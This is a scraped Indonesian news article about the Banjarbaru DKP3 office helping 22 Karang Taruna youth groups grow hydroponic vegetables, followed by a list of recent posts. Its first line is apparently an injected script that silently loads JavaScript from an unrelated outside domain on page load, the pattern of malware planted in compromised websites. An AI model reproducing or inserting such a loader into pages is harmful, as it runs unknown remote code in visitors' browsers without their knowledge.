(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DKP3 Banjarbaru

Cara DKP3 Banjarbaru Gandeng Karang Taruna Sukseskan Program Urbang Farming


KANALKALIMANTAN.COM, BANJARBARU – Dinas Ketahanan Pangan, Pertanianan dan Perikanan (DKP3) Kota Banjarbaru mempunyai cara tersendiri dalam menyukseskan program farming. Salah satunya ialah bekerjasama dengan Karang Taruna di wilayah Banjarbaru.

Dengan metode budidaya hidroponik, DKP3 Banjarbaru menggandeng 22 Katang Taruna yang tersebar di berbagai wilayah. Mereka dibantu berbudidaya hidroponik sehingga dapat menghasilkan berbagai macam sayuran secara mandiri.

Salah satu yang sukses yakni Kelompok Masyarakat (Pokmas) Sehat Alami yang telah berpanen raya Tanaman Hidroponik Selada hingga Pakcoy.

Pokmas yang berlokasi di Kelurahan Mentaos, Kecamatan Banjarbaru Utara, secara mandiri telah memproduksi berbagai macam sayuran. Produk mereka bahkan telah diperjualbelikan di toko-toko maupun mini market.

Baca juga: Mulyadi Akui Tak Setor ke Kas Daerah, Kasus Korupsi Sidang Program DPKUP di HSS

Menurut Lurah Mentaos, Zulhulaifah, mengatakan, DKP3 Banjarbaru selalu melakukan pembinaan dan monitoring terkait perkembangan bibit.

“Sarana prasarana sudah diperbantukan oleh DKP3 Banjarbaru. Kemudian teman-teman karang taruna juga diajarkan untuk perkembangan bibit sehingga bisa menghasil sayur yang hijau dan segar,” ucapnya.

Selain meningkatkan produktivitas anggota karang taruna, Lurah Mentaos berharap budidaya hidroponik juga diharapkan dapat memenuhi ketersediaan pangan masyarakat setempat, khususnya anggota karang taruna itu sendiri.

“Karena hasilnya bisa diperjualbelikan, diharapkan mereka bisa mandiri dalam berusaha ,” terangnya.

Baca juga: Bawaslu HSU Minta Panwaslucam Optimalkan Pengawasan Masa Kampanye

Program Urban Farming yang dijalankan DKP3 Banjarbaru diharapkan dapat menjaga ketersediaan pangan dengan harga stabil, aman, sehat dan halal. Serta produk hasil pangan yang dibuat, dapat diolah menjadi bahan jadi.

Untuk diketahui, program urban farming telah diatur dalam Peraturan Wali Kota (Perwali) Nomor 36 Tahun 2022 tentang Pemanfaatan Ruang Terbuka untuk Pertanian, Peternakan, dan Perikanan Perkotaan. (Kanalkalimantan.com/al)

Reporter : al
Editor : kk


Risa

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

13 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

14 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

15 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

16 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

19 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

22 jam ago

This website uses cookies.